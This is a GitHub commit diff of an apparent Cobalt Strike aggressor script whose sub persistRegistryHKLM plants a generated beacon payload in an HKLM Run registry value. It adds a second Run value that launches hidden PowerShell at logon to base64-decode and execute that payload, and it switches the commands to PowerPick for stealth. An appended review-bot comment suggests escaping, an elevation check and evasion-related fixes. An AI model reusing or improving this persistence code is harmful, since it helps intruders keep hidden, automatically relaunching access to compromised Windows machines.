Updated with PowerPick

Execute-Assembly
Harley Lebeau 2018-02-09 12:26:55 -07:00 committed by GitHub
parent 5dad6bd0b5
commit 74549b9ad3
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 4 additions and 4 deletions


@ -23,16 +23,16 @@ sub persistRegistryHKLM {
else { else {
$data = payloadgenerate($bid); $data = payloadgenerate($bid);
$powershellcmd = "Set-ItemProperty -Path 'HKLM:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -Name '".$3['keyname']."' -Type String -Value \"".$data."\""; $powershellcmd = "Set-ItemProperty -Path 'HKLM:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -Name '".$3['keyname']."' -Type String -Value \"".$data."\"";
bpowershell!($bid, $powershellcmd); bpowerpick!($bid, $powershellcmd);
blog($bid, "\cBSetting the first HKLM Run Key Value as '".$3['keyname']."'..."); blog($bid, "\cBSetting the first HKLM Run Key Value as '".$3['keyname']."'...");
$powershellcmd1 = "Set-ItemProperty -Path 'HKLM:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -Name '".$3['keyname1']."' -Value 'C:\\Windows\\SySWoW64\\WindowsPowerShell\\v1.0\\powershell.exe -w hidden -c (IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((gp HKLM:Software\\Microsoft\\Windows\\CurrentVersion\\Run ".$3['keyname'].").".$3['keyname']."))))'"; $powershellcmd1 = "Set-ItemProperty -Path 'HKLM:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -Name '".$3['keyname1']."' -Value 'C:\\Windows\\SySWoW64\\WindowsPowerShell\\v1.0\\powershell.exe -w hidden -c (IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((gp HKLM:Software\\Microsoft\\Windows\\CurrentVersion\\Run ".$3['keyname'].").".$3['keyname']."))))'";
bpowershell!($bid, $powershellcmd1); bpowerpick!($bid, $powershellcmd1);
blog($bid, "\cBSetting the second HKLM Run Key Value as '".$3['keyname1']."'..."); blog($bid, "\cBSetting the second HKLM Run Key Value as '".$3['keyname1']."'...");
blog($bid, "\cBDisplaying both Run Keys to Verify everything worked as intended..."); blog($bid, "\cBDisplaying both Run Keys to Verify everything worked as intended...");
$powershellcmd2 = "Get-ItemProperty -Path 'HKLM:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -Name '".$3['keyname']."'"; $powershellcmd2 = "Get-ItemProperty -Path 'HKLM:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -Name '".$3['keyname']."'";
bpowershell!($bid, $powershellcmd2); bpowerpick!($bid, $powershellcmd2);
$powershellcmd3 = "Get-ItemProperty -Path 'HKLM:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -Name '".$3['keyname1']."'"; $powershellcmd3 = "Get-ItemProperty -Path 'HKLM:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -Name '".$3['keyname1']."'";
bpowershell!($bid, $powershellcmd3); bpowerpick!($bid, $powershellcmd3);
} }
})); }));
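Review bot: The key names from `$3['keyname']` and `$3['keyname1']` and the payload in `$data` are spliced unescaped into the PowerShell strings built for `$powershellcmd` through `$powershellcmd3`, so a name containing a single quote, or a payload containing `"` or `$`, breaks out of the quoted argument and changes what `bpowerpick!` executes; the switch from `bpowershell!` does not change that. Escaping is cheap in Sleep, e.g. `$kn = replace($3['keyname'], "'", "''");` before building the commands and using `$kn` where the raw value is used now. Nothing verifies the beacon is elevated before writing under HKLM, so on a medium-integrity beacon the four `bpowerpick!` calls fail with an access-denied error buried in the PowerPick output; a guard such as `if (!-isadmin $bid) { berror($bid, "HKLM Run persistence needs an elevated beacon"); return; }` at the top of the sub would make that explicit, though that spot is outside this hunk. Note also that the second Run value still launches `C:\Windows\SySWoW64\WindowsPowerShell\v1.0\powershell.exe` at logon, so PowerPick only avoids powershell.exe during setup, not for the persistence trigger, and that path does not exist on 32-bit Windows. persistRegistryHKLM begins before this hunk.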